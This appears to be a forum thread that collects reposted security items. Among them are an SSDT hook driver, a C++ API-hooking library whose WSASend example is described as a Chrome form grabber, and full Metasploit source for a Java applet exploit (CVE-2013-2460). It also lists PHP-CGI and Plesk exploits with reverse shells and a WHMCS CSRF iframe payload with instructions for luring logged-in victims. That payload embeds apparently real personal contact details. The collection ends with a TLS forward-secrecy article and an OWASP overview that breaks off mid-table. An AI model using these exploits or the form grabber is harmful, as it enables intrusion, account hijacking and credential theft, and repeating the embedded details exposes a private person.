Nytro

[h=1]My first SSDT hook driver[/h]by zwclose7 Hello, this is my first SSDT hook driver. My driver will hook NtTerminateProcess, NtLoadDriver, NtOpenProcess and NtDeleteValueKey. NtTerminateProcess hook This hook will protect any process named calc.exe from being terminated. NtLoadDriver hook This hook will display the driver name in the debugger/DebugView. NtOpenProcess hook This hook will deny access to any process named cmd.exe, and will return STATUS_ACCESS_DENIED if the process name match. NtDeleteValueKey hook This hook will protect any values named abcdef from being deleted. To load the driver, run the loader.exe in the release folder. This program will install the driver to the system, and then load it. All functions will be unhooked when the driver unloads. [h=4]Attached Files[/h] SSDTHook.zip 287.99K 39 downloads Sursa: My first SSDT hook driver - rohitab.com - Forums zwclose7

[h=1]ExtendedHook Functions c++[/h]By RosDevil [intro] I decided to give away one of my master sources, a bauch of functions that are really useful to hook APIs (or any address) on x86 machines. (i'm writing a x64 version, will be published as soon as possible) ExtendedHook.h 1.46K 17 downloads ExtendedHook.cpp 3.21K 9 downloads [index] This page is divided so: - Function Documentation - EHOOKSTRUCT structure - Usage - Compiler settings and notes to remember - Example 1# - hooking MessageBox - Example 2# - hooking DirectX (version 9 in this case) - Example 3# - hooking WSASend [Functions Documentation] There are 3 main functions (InstallEHook, InstallEHookEx, CustomEHook) and 1 to unhook (UnistallEHook). //InstallEHook bool InstallEHook( LPCSTR API, LPCTSTR lib, PEHOOKSTRUCT EHookA, void * redit ); PARAMETERS LPCSTR API: the name of the API LPCTSTR lib: module name or path PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. RETURN VALUE If the function succeeds it returns true, otherwise false. REMARKS This function first tries to get the module through GetModuleHandle of the given dll name or path, if it fails, it tries a LoadLibrary. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //InstallEHookEx bool InstallEHookEx( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit ); PARAMETERS void * TargetAddress: in this case function you give the address of the function to hook. This function is needed especially when you try to hook a function which you don't have the definition but only the address. (See Example 2# to understand better) PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. RETURN VALUE If the function succeeds it returns true, otherwise false. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //CustomEHook bool CustomEHook( void * TargetAddress, PEHOOKSTRUCT EHookA, void * redit, unsigned int bytes_jmp ); PARAMETERS void * TargetAddress: in this case function you give the address of the function to hook. This function is needed especially when you try to hook a function which you don't have the definition but only the address. (See Example 2# to understand better) PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT void * redit: address of the function that will receive the parameters of the call. When the API is called, it will be redirected there. unsigned int bytes_jmp: integer that cointains the number of bytes that must be copied to hook. This function is specific for the address of strange APIs that might have a particular beginning signature that the above functions don't recognize, mostly you will use this when trying to hook an address in the middle of an API, not at the beginning. RETURN VALUE If the function succeeds it returns true, otherwise false. REMARKS This function is can easily crash if you are not careful, it does not check anything and the given bytes don't corrispond to the end of a specific instruction you won't be able to call the original API, if you do it, it will crash. ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- //UnistallEHook void * UninstallEHook( PEHOOKSTRUCT EHookA ); PARAMETER PEHOOKSTRUCT EHookA: pointer to an EHOOKSTRUCT to unistall the hook. RETURN VALUE If the function succeeds it returns the original address of the API, otherwise NULL. [EHOOKSTRUCT structure] This structure is the core of these functions. typedef struct _EHOOKSTRUCT{ DWORD * adr_init; DWORD * adr_redirect; DWORD * adr_new_api; DWORD bytes_size; }EHOOKSTRUCT, *PEHOOKSTRUCT; MEMBERS DWORD * adr_init: Stores the original address DWORD * adr_redirect: Stores the address of the hook function DWORD * adr_new_api: Stores the address of the NEW API DWORD bytes_size: Number of bytes copied to perform the hook [usage] This is a general summary how to use these functions. It's easier if you look at the examples. #include "ExtendedHook.h" typedef -type- ( -Api Prototype- ) ( -parameters- ); EHOOKSTRUCT api_tohook; //define a function exately the same of the prototype -type- Api_function_hook ( -parameters- ); -type- Api_function_hook ( -parameters- ){ //here you can manage the paramters return ((-Api Prototype-)api_hook.adr_new_api) (- parameters -); //perform the call with any paramters you want, right parameters or changed } int main(){ if (InstallEHook("-Api name-", "-Api module-", &api_tohook, &Api_function_hook) == false){ printf("Error hooking"); return 1; } return 0; } [Compiler settings and notes to remember] This hooking method requires one change in the compiler settings. - Disable intrinsic functions [VC++] Project -> Properties -> Configuration Property -> C/C++ -> Optimization -> Enable Intrinsic Functions -> [No] Notes - When you define the function protoype and its function hook, it must be the same of the orginal API, no changes in the parameters count, moreover remember to put WINAPI (__stdcall) in the definition when is needed, otherwise it won't work. - There are some APIs that are necessary for any other api, like GetModuleHandle, GetProcAddress, LoadLibrary... if you want to hook these APIs remember not to call any other API inside the hook function that requires them, otherwise you will obtain an infinite loop. [Example 1# - hooking MessageBox] #include "stdafx.h" #include "windows.h" #include <iostream> #include "ExtendedHook.h" using namespace std; typedef int (WINAPI * pMessageBox)(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types); //function prototype int WINAPI MessageBoxWHooker(HWND myhandle, LPCTSTR text, LPCTSTR caption, UINT types); //function hook EHOOKSTRUCT myApi; //essential structure pMessageBox myMessageBox = NULL; //optional, but i think it is useful int _tmain(int argc, _TCHAR* argv[]) { if (InstallEHook("MessageBoxW", L"User32.dll", &myApi, &MessageBoxWHooker) == false){ wcout<<"Error hooking"<<endl; return 1; } myMessageBox = (pMessageBox)myApi.adr_new_api; //[optional] this will be a MessageBox without hook myMessageBox(0, L"Hooking is my speciality!", L"ROSDEVIL", MB_OK | MB_ICONWARNING); if (MessageBox(0, L"Hi, did you understand?", L"ehi", MB_YESNO) == IDYES) {//this will be hooked! wcout<<"You have pressed yes"<<endl; }else{ wcout<<"You have pressed no"<<endl; } UninstallEHook(&myApi); cin.get(); return 0; } int WINAPI MessageBoxWHooker(HWND myhandle, LPCWSTR text, LPCWSTR caption, UINT types){ wcout<<"-- MessageBoxW hooked!"<<endl; wcout<<"HWND: "<<myhandle<<endl; wcout<<"Text: "<<text<<endl; wcout<<"Caption: "<<caption<<endl; wcout<<"Buttons/Icon: "<<types<<endl; return ((pMessageBox)myApi.adr_new_api)(myhandle, text, caption, types); } [Example 2# - hooking DirectX (version 9 in this case)] This is an cool example, a dll that must be injected from the very beginning of the game. If you delve into DirectX hooking you will know what i'm talking about. It has been tested on Age of Empires 3 (x86). //AgeOfEmpireHook.dll #include "stdafx.h" #include "windows.h" #include "d3dx9.h" #include "ExtendedHook.h" #pragma comment(lib, "d3dx9.lib") void start_hooking(); void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height); int times_load = 0; typedef DWORD D3DCOLOR; IDirect3DDevice9 * DeviceInterface; //hook Direct3DCreate9 typedef IDirect3D9 *(WINAPI * pDirect3DCreate9) (UINT SDKVersion); EHOOKSTRUCT api_Direct3DCreate9; IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion); //hook CreateDevice typedef HRESULT (APIENTRY * pCreateDevice)( IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface ); EHOOKSTRUCT api_CreateDevice; HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface); //Hook EndScene typedef HRESULT (WINAPI * pEndScene)(IDirect3DDevice9 * pDevInter); EHOOKSTRUCT api_EndScene; HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("Direct3DCreate9", L"d3d9.dll", &api_Direct3DCreate9, &Direct3DCreate9_Hook)==false){ MessageBox(0, L"Error while hooking Direct3DCreate9", L"Hooker", MB_OK | MB_ICONWARNING); } return; } IDirect3D9 * WINAPI Direct3DCreate9_Hook(UINT SDKVersion){ IDirect3D9 * pDev = ((pDirect3DCreate9)api_Direct3DCreate9.adr_new_api)(SDKVersion); _asm pushad DWORD * vtable = (DWORD*)*((DWORD*)pDev); //VTABLE if (times_load == 1){ //the first time d3d9.dll is used, isn't for the game making, we need the second InstallEHookEx((void*)vtable[16], &api_CreateDevice, &CreateDevice_hook); } times_load += 1; _asm popad return pDev; } HRESULT APIENTRY CreateDevice_hook(IDirect3D9 * pDev, UINT Adapter, D3DDEVTYPE DeviceType, HWND hFocusWindow, DWORD BehaviorFlags, D3DPRESENT_PARAMETERS* pPresentationParameters, IDirect3DDevice9** ppReturnedDeviceInterface){ HRESULT final = ((pCreateDevice)api_CreateDevice.adr_new_api)(pDev, Adapter, DeviceType, hFocusWindow, BehaviorFlags, pPresentationParameters, ppReturnedDeviceInterface); _asm pushad DWORD * DevInterface = (DWORD*)*((DWORD*)*ppReturnedDeviceInterface); //VTABLE InstallEHookEx((void*)DevInterface[42], &api_EndScene, &EndScene_hook); //EndScene _asm popad return final; } HRESULT WINAPI EndScene_hook(IDirect3DDevice9 * pDevInter){ _asm pushad WriteText(pDevInter, L"AGE OF EMPIRES EXTENDED HOOK BY ROSDEVIL", 20, 20, 300, 50); if (GetAsyncKeyState(VK_F1))WriteText(pDevInter, L"Hooked functions:\n - CreateDevice\n - EndScene\n", 20, 50, 150, 100); _asm popad return ((pEndScene)api_EndScene.adr_new_api)(pDevInter); } void WriteText(IDirect3DDevice9 * d3ddev, LPCTSTR text, long x, long y, long width, long height){ ID3DXFont *m_font; D3DXCreateFont(d3ddev, 15, 0, FW_BOLD, 0, FALSE, DEFAULT_CHARSET, OUT_DEFAULT_PRECIS, DEFAULT_QUALITY, DEFAULT_PITCH | FF_DONTCARE, TEXT("Arial"), &m_font ); D3DCOLOR fontColor1 = D3DCOLOR_XRGB(255, 0, 0); RECT space; space.top = y; space.left = x; space.right = width + x; space.bottom = height + y; m_font->DrawText(NULL, text, -1, &space, 0, fontColor1); m_font->Release(); } [Example 3# - hooking WSASend] This example is again a dll, but doesn't require to be injected at the very beginning since the function that we are going to hook doesn't belong to a any class. It has been tested on Chrome to create a FormGrabber. //ChromeHook.dll #include "stdafx.h" #include "windows.h" #include "ExtendedHook.h" bool first = true; void start_hooking(); //I don't want to include all winsock.h so let's declare want we need: //(you can include winsock.h, it's quicker) typedef unsigned int SOCKET; typedef void* LPWSAOVERLAPPED_COMPLETION_ROUTINE; typedef struct __WSABUF { unsigned long len; char FAR *buf; } WSABUF, *LPWSABUF; typedef struct _WSAOVERLAPPED { ULONG_PTR Internal; ULONG_PTR InternalHigh; union { struct { DWORD Offset; DWORD OffsetHigh; }; PVOID Pointer; }; HANDLE hEvent; } WSAOVERLAPPED, *LPWSAOVERLAPPED; //hook WSASend typedef int (WINAPI * pWSASend)( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); EHOOKSTRUCT api_WSASend; int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: start_hooking(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } void start_hooking(){ if (InstallEHook("WSASend", L"Ws2_32.dll", &api_WSASend, &WSASend_hook)==false){ MessageBox(0, L"Error while hooking WSASend", L"Hooker", MB_OK | MB_ICONWARNING); } } int WINAPI WSASend_hook( SOCKET s, LPWSABUF lpBuffers, DWORD dwBufferCount, LPDWORD lpNumberOfBytesSent, DWORD dwFlags, LPWSAOVERLAPPED lpOverlapped, LPWSAOVERLAPPED_COMPLETION_ROUTINE lpCompletionRoutine ){ _asm pushad if (first == true){ //only show the first time a call is intercepted MessageBox(0, L"WSASEND FIRST INTERCEPTED!", L"CHROME HOOK", MB_OK); first = false; } //NOW WE CAN HANDLE, CRACK, COPY, ALTER, SMASH, ABORT all it's parameters! //... your code man ... _asm popad return ((pWSASend)api_WSASend.adr_new_api)(s, lpBuffers, dwBufferCount, lpNumberOfBytesSent, dwFlags, lpOverlapped, lpCompletionRoutine); } Well, we're done! PUT LIKE IF YOU APPRECIATE I've updated my ExtendedHook.cpp, there were a little bug about the bytes to copy. [see attachment] RosDevil Sursa: ExtendedHook Functions c++ - rohitab.com - Forums

[h=1]A simple SSL tweak could protect you from GCHQ/NSA snooping[/h][h=2]It might slow you down, but hey, you can't have everything[/h] By John Leyden, 26th June 2013 An obscure feature of SSL/TLS called Forward Secrecy may offer greater privacy, according to security experts who have begun promoting the technology in the wake of revelations about mass surveillance by the NSA and GCHQ. Every SSL connection begins with a handshake, during which the two parties in an encrypted message exchange perform authentication and agree on their session keys, through a process called key exchange. The session keys are used for a limited time and deleted afterwards. The key exchange phase is designed to allow two users to exchange keys without allowing an eavesdropper to intercept or capture these credentials. Several key exchange mechanisms exist but the most widely used mechanism is based on the well-known RSA algorithm, explains Ivan Ristic, director of engineering at Qualys. This approach relies on the server's private key to protect session keys. "This is an efficient key exchange approach, but it has an important side-effect: anyone with access to a copy of the server's private key can also uncover the session keys and thus decrypt everything," Ristic warns. This capability makes it possible for enterprise security tools - such as intrusion detection and web application firewalls - to screen otherwise undecipherable SSL encrypted traffic, given a server’s private keys. This feature has become a serious liability in the era of mass surveillance. GCHQ have been secretly tapping hundreds of fibre-optic cables to tap data, The Guardian reported last week, based on documents leaked to the paper by former NSA contractor turned whistleblower Edward Snowden. The NSA also carries out deep packet inspection analysis of traffic passing through US fibre optic networks. Related revelations show that the NSA applies particular attention - and special rules - to encrypted communications, such as PGP-encrypted emails and SSL encrypted messages. Captured data should really be destroyed within five years, unless it consists of "communications that are enciphered or reasonably believed to contain secret meaning, and sufficient duration may consist of any period of time during which encrypted material is subject to, or of use in, cryptanalysis", according to the terms of a leaked Foreign Intelligence Surveillance Court order. The upshot is that intelligence agencies are collecting all the traffic they can physically capture before attempting to snoop upon encrypted content, where possible. These techniques are currently only practical for intelligence agencies but this may change over time - and those interested in protecting privacy need to act sooner rather than later, Ristic argues. "Your adversaries might not have your private key today, but what they can do now is record all your encrypted traffic," Ristic explains. "Eventually, they might obtain the key in one way or another - for example, by bribing someone, obtaining a warrant, or by breaking the key after sufficient technology advances. At that point, they will be able to go back in time to decrypt everything." The Diffie–Hellman protocol offers an alternative algorithm to RSA for cryptographic key exchange. Diffie–Hellman is slower but generates more secure session keys that can't be recovered simply by knowing the server's private key, a protocol feature called Forward Secrecy. "Breaking strong session keys is clearly much more difficult than obtaining servers' private keys, especially if you can get them via a warrant," Ristic explains. "Furthermore, in order to decrypt all communication, now you can no longer compromise just one key - the server's - but you have to compromise the session keys belonging to every individual communication session." Someone with access to the server's private key can perform an active man-in-the-middle attack and impersonate the target server. However, they can do that only at the time the communication is taking place. It is not possible to pile up mountains of encrypted traffic for later decryption. So, Forward Secrecy still creates a significant obstacle against industrial scale snooping. SSL supports Forward Secrecy using two algorithms: Diffie-Hellman (DHE) and the adapted version for use with Elliptic Curve cryptography (ECDHE). The main obstacle to using Forward Secrecy has been that Diffie-Hellman is significantly slower, leading to a decision by many website operators to disable the feature in order to get better performance. "In recent years, we've seen DHE fall out of fashion. Internet Explorer 9 and 10, for example, support DHE only in combination with obsolete DSA keys," Ristic explains, adding that ECDHE is bit faster than DHE but still slower than RSA. In addition, ECDHE algorithms are relatively new and not as widely supported in web server software packages. The vast majority of modern browsers support ECDHE. Website admins who add support for the encryption technique would help the majority of their privacy-conscious customers and adding DHE allows Forward Secrecy to be offered to the rest. A blog post by Ristic explains how to enable Forward Secrecy on SSL web servers, a well as providing a good explanation about the technology is beneficial for privacy - as well as noting the limitations of the technique. "Although the use of Diffie-Hellman key exchange eliminates the main attack vector, there are other actions a powerful adversary could take," Ristic warns. "For example, they could convince the server operator to simply record all session keys." "Server-side session management mechanisms could also impact Forward Secrecy. For performance reasons, session keys might be kept for many hours after the conversation had been terminated. "In addition, there is an alternative session management mechanism called session tickets, which uses separate encryption keys that are rarely rotated - possibly never in extreme cases. "Unless you understand your session tickets implementation very well, this feature is best disabled to ensure it does not compromise Forward Secrecy," Ristic concludes. Ristic founded SSL Labs, a research project to measure and track the effective security of SSL on the internet. He has over time worked with other security luminaries such as Taher Elgamal, one of the creators of the SSL protocol, and Moxie Marlinspike, creator of Convergence, to tackle SSL governance and implementation issues and promote best practice. Whether sysadmins switch to more privacy-friendly key exchange methods in spite of performance drawbacks is by no means sure, but publicising the issue at least gives them the chance to decide for themselves. ® Sursa: A simple SSL tweak could protect you from GCHQ/NSA snooping • The Register

Java Applet ProviderSkeleton Insecure Invoke Method Authored by Adam Gowdiak, Matthias Kaiser | Site metasploit.com This Metasploit module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) EXPLOIT_STRING = "Exploit" def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet ProviderSkeleton Insecure Invoke Method', 'Description' => %q{ This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Adam Gowdiak', # Vulnerability discovery according to Oracle's advisory and also POC 'Matthias Kaiser' # Metasploit module ], 'References' => [ [ 'CVE', '2013-2460' ], [ 'OSVDB', '94346' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html'], [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u/jdk/rev/160cde99bb1a' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-61.zip' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 18 2013' )) end def randomize_identifier_in_jar(jar, identifier) identifier_str = rand_text_alpha(identifier.length) jar.entries.each { |entry| entry.name.gsub!(identifier, identifier_str) entry.data = entry.data.gsub(identifier, identifier_str) } end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "ExpProvider.class") @provider_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-2460", "DisableSecurityManagerAction.class") @action_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha(EXPLOIT_STRING.length) @exploit_class.gsub!(EXPLOIT_STRING, @exploit_class_name) super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("ExpProvider.class", @provider_class) jar.add_file("DisableSecurityManagerAction.class", @action_class) randomize_identifier_in_jar(jar, "metasploit") randomize_identifier_in_jar(jar, "payload") jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html html = %Q| <html> <body> <applet archive="#{rand_text_alpha(rand(5) + 3)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet> </body> </html> | return html end end Sursa: Java Applet ProviderSkeleton Insecure Invoke Method ? Packet Storm

PHP-CGI Argument Injection Authored by infodox Exploit for the PHP-CGI argument injection vulnerability disclosed in 2012. Has file uploading, inline shell spawning, and both python and perl reverse shell implementations using an earlier version of the "payload" library written for such exploits. Download: http://packetstormsecurity.com/files/download/122162/phpcgi.tar.gz Sursa: PHP-CGI Argument Injection ? Packet Storm

Plesk PHP Code Injection Authored by Kingcope, infodox Reliable exploit for the Plesk PHP code injection vulnerability disclosed by Kingcope in June 2013. Can deliver inline and reverse shells using the payloads library, as well as offering (buggy) file upload features. Download: http://packetstormsecurity.com/files/download/122163/plesk-php.tar.gz Sursa: Plesk PHP Code Injection ? Packet Storm

WHMCS Cross Site Request Forgery ########################################################################### # Exploit Title: WHMCS [CSRF] All Versions (0day) # Team: MaDLeeTs # Software Link: http://www.whmcs.com # Version: All # Site: http://www.MaDLeeTs.com # Email: LeeTHaXor@Y7Mail.com #######################Video####################################### http://vimeo.com/63686629 ########################################################################### https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768 ########################iFrame Code To Add On Deface############################## <IFRAME src="[Exploit Code]" width="1" height="1" scrolling="auto" frameborder="0"></iframe> Example: <IFRAME src="https://manage.fatservers.my/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=LeeTHaxor%40Y7Mail.Com&address1=B10-12%2C+Endah+Puri+Condominium%2C&address2=Jalan+3%2F149E%2C+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield%5B1%5D=max%40antswork.com&customfield%5B2%5D=&customfield%5B3%5D=%2B6019.3522298&customfield%5B4%5D=%2B603.90578663&customfield%5B5%5D=Laura+-+0192182996&customfield%5B6%5D=Owner+of+Company&customfield%5B7%5D=&customfield%5B8%5D=&customfield%5B9%5D=Old+Contact+Details%3A+A2-11-8%2C+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel%3A+603.86560268+Fax%3A?+603.86560768" width="1" height="1" scrolling="auto" frameborder="0"></iframe> ########################################################################### All you need to do is add it into your Deface page and make your target view the deface page, He MUST loggin 1st into his clientarea in order to get his email updated. ########################################################################### Greetz to : H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker | c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de | makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | | ThaRude | ThaDark | Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members ########################################################################### http://www.MaDLeeTs.com ########################################################################### Sursa: WHMCS Cross Site Request Forgery ? Packet Storm

Encryption At The Software Level: Linux And Windows Description: In this video Mark Stanislav From Due Security Discuss about Encryption for Linux and Farooq Ahmed Development Manager of Online Tech discuss encryption for Windows. Encryption Changing plain text into cipher text in order to make the original data unreadable to anyone not possessing knowledge of the decryption algorithm and any required key For More Information Please Visit : Compliant Cloud | Colocation | Managed Servers | Disaster Recovery Sursa: Encryption At The Software Level: Linux And Windows

Ssl Traffic Analysis Attacks - Vincent Berg Description: The talk will focus on modern SSL traffic analysis attacks. Although it has been known and great papers have been published about it most people still are not aware of the length an attacker can go through in order to extract useful information from the SSL sessions. By showing some large targets and some useful progress in that space it is hoped that the audience will gain a better understanding of what SSL traffic analysis is, that it is a real threat (depending on the skills of the assumed adversary), and some knowledge on how to try and avoid these type of attacks. There will be a bunch of research tools accompanying the talk with at least one being a proof of concept on how to do traffic analysis on Google Maps. For more information, please visit: :- Breakpoint 2012 Speakers List Sursa: Ssl Traffic Analysis Attacks - Vincent Berg

[h=1]OWASP Top Ten Testing and Tools for 2013[/h]Jonathan Lampe June 27, 2013 In 2013 OWASP completed its most recent regular three-year revision of the OWASP Top 10 Web Application Security Risks. The Top Ten list has been an important contributor to secure application development since 2004, and was further enshrined after it was included by reference in the in the Payment Card Industry Security Standards Council’s Data Security Standards, better known as the PCI-DSS. Surprisingly, there were only a few changes between the 2010 Top Ten and 2013 Top Ten lists, including one addition, several reorders and some renaming. The most prevalent theme was probably that both cross-site scripting (XSS) and cross-site request forgery (CSRF) dropped in importance: XSS dropping apparently because safer scripting libraries are becoming more widespread, and CSRF dropping because these vulnerabilities are not as common as once thought. In any case, the current entries in the OWASP Top Ten Web Application Security Risks for 2013 are: A1: Injection: Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. [*] A2: Broken Authentication and Session Management Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or exploit other implementation flaws to assume other users’ identities. [*] A3: Cross-Site Scripting (XSS) XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites. [*] A4: Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data. [*] A5: Security Misconfiguration Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server and platform. All these settings should be defined, implemented and maintained as many are not shipped with secure defaults. This includes keeping all software up to date. [*] A6: Sensitive Data Exposure Many web applications do not properly protect sensitive data, such as credit cards, SSNs, tax IDs and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud or other crimes. Sensitive data deserves extra protection such as encryption at rest or encryption in transit, as well as special precautions when exchanged with the browser. [*] A7: Missing Function Level Access Control Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality. [*] A8: Cross-Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim. [*] A9: Using Components with Known Vulnerabilities Vulnerable components, such as libraries, frameworks, and other software modules almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts. [*] A10: Unvalidated Redirects and Forwards Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing, malware sites or use forwards to access unauthorized pages. This is the fourth edition of a list that comes out every three years, and with the limited changes between 2010 and 2013 it is fair to say that OWASP’s popular Top Ten list has matured. With maturity and popularity, automation and utilities that directly address the items on the list have arrived, and some of the best are summarized in the chart below. [TABLE] [TR] [TD]WEB APPLICATION RISK[/TD] [TD]SECURITY UTILITY[/TD] [/TR] [TR] [TD]A1: Injection[/TD] [TD]SQL Inject Me and Zed Attack Proxy (ZAP)[/TD] [/TR] [TR] [TD]A2: Broken Authentication and Session Management[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A3: Cross-Site Scripting (XSS)[/TD] [TD]ZAP[/TD] [/TR] [TR] [TD]A4: Insecure Direct Object References[/TD] [TD]HTTP Directory Traversal Scanner, Burp Suite and ZAP[/TD] [/TR] [TR] [TD]A5: Security Misconfiguration[/TD] [TD]OpenVAS and WATOBO[/TD] [/TR] [TR] [TD]A6: Sensitive Data Exposure[/TD] [TD]Qualys SSL Server Test[/TD] [/TR] [TR] [TD]A7: Missing Function Level Access 